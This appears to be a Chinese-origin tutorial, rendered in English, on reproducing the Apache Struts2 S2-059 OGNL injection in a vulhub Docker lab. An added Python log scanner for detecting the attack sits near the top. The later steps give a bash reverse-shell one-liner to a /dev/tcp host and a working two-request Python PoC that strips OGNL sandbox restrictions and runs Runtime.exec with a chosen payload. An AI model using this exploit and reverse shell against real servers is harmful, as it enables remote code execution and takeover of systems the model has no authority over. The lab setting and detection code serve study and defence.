Struts2 is a powerful open source Java web framework released by the Apache Software Foundation; at its core it is essentially a servlet. Struts2 is based on the MVC architecture and has a clear framework structure. It is usually used as the controller that mediates data exchange between models and views, and it is used to build enterprise-level Java web applications. It uses and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the design ideas of WebWork as its core, absorbs some advantages of the original Struts framework, and provides a cleaner web application framework implemented in the MVC design pattern.
When external input that an attacker controls is used as the attribute value of a Struts2 tag, the tag evaluates that value as an OGNL expression, so a malicious OGNL expression supplied in the input is executed, ultimately leading to remote code execution.
Affected versions: Struts 2.0.0 – Struts 2.5.20
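The two facts above (attacker-controlled input being evaluated as OGNL, and the affected version range) are what a defender needs to check for. The following Python is an added example written for this page, not code from the original article or from the Struts project: it parses a few constructed access-log lines, URL-decodes each query parameter (twice, since the `%{...}` marker usually arrives as `%25%7B`), and flags values that carry an OGNL evaluation marker or the identifiers the page's probe and PoC rely on (`#context`, `struts.valueStack`, `OgnlUtil`, `setMemberAccess`, `@java.lang.Runtime@`). It also checks whether a reported Struts version falls inside the 2.0.0 to 2.5.20 range quoted above. The log format (combined log format) and the sample lines are assumptions made for the example.

```python
"""Detection helper for OGNL-injection attempts against Struts2 (added example)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (combined log format) so the example runs offline.
# Line 2 is the %{88*88} probe from this page (URL-encoded); line 3 carries PoC identifiers.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=%25%7B88*88%7D HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /?id=%25%7B(%23context%3D%23attr%5B'struts.valueStack'%5D.context)%7D HTTP/1.1" 200 12
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=price%20%3C%2050 HTTP/1.1" 200 800
"""

# Minimal combined-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# %{...} and ${...} are the OGNL evaluation markers Struts2 recognises.
OGNL_MARKER_RE = re.compile(r'[%$]\{')

# Identifiers that appear in the OGNL probe/PoC on this page; a legitimate "id" parameter
# has no reason to contain any of them.
SUSPICIOUS_TOKENS = (
    "#context", "#attr", "struts.valueStack", "OgnlUtil",
    "setExcludedClasses", "setExcludedPackageNames",
    "setMemberAccess", "DEFAULT_MEMBER_ACCESS",
    "@java.lang.Runtime@", "getRuntime", "ProcessBuilder",
)


def decode_params(target):
    """Split the request target's query string and URL-decode every value twice."""
    query = urlsplit(target).query
    params = parse_qsl(query, keep_blank_values=True)  # parse_qsl already decodes once
    return [(name, unquote(value)) for name, value in params]  # second pass catches %25-style double encoding


def classify_request(target):
    """Return (param, decoded_value, reasons) for every parameter that looks like OGNL injection."""
    findings = []
    for name, value in decode_params(target):
        reasons = []
        if OGNL_MARKER_RE.search(value):
            reasons.append("ognl-eval-marker")
        hits = [tok for tok in SUSPICIOUS_TOKENS if tok.lower() in value.lower()]
        if hits:
            reasons.append("tokens:" + ",".join(hits))
        if reasons:
            findings.append((name, value, reasons))
    return findings


def scan_log(text):
    """Run classify_request over each parsable log line and collect alerts in line order."""
    alerts = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        for name, value, reasons in classify_request(match.group("target")):
            alerts.append({
                "ip": match.group("ip"),
                "method": match.group("method"),
                "param": name,
                "value": value,
                "reasons": reasons,
            })
    return alerts


def version_in_affected_range(version, low="2.0.0", high="2.5.20"):
    """True if a dotted Struts version string lies inside the range quoted on this page."""
    def as_tuple(s):
        return tuple(int(re.match(r"\d+", part).group()) for part in s.split("."))
    return as_tuple(low) <= as_tuple(version) <= as_tuple(high)


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
    print("2.5.20 affected:", version_in_affected_range("2.5.20"))
    print("2.5.22 affected:", version_in_affected_range("2.5.22"))
```

The marker check alone already catches the `%{88*88}` probe, so it is the cheapest signal to alert on; the token list is there to reduce false positives when you want a higher-confidence rule, since a URL-encoded `{` in an ordinary parameter is rare but not impossible.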
1. The vulnerable environment is built quickly with vulhub. vulhub can be downloaded from:
https://github.com/vulhub/vulhub
cd vulhub-master/struts2/s2-059
2. Use docker-compose to bring up the lab environment
docker-compose up -d
3. Once startup has completed, visit http://ip:8080/?id=1 in the browser and you will see the test page
1. Visit http://ip:8080/?id=%{88*88} in the browser. The result of 88*88 appears in the page, which shows that the OGNL expression was evaluated: the attribute value of the Struts2 tag triggers OGNL expression parsing.
2. Use the PoC to obtain a reverse shell. The reverse shell payload must be base64-encoded
bash -i >& /dev/tcp/172.16.1.132/9967 0>&1
Base64-encoding tool URL: http://www.jackson-t.ca/runtime-exec-payloads.html
```python
import requests

url = "http://127.0.0.1:8080"

# First request: empties OgnlUtil's excluded class and package lists
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}

# Second request: resets member access and runs the command (replace the placeholder with the base64-encoded payload)
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('payload-base64-encoded'))}"
}

res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
```
3. Replace the payload in the PoC with your own, then run it with Python; the reverse shell connects back.
The above is the detailed content of "How does the Struts2 S2-059 remote code execution vulnerability reproduce?".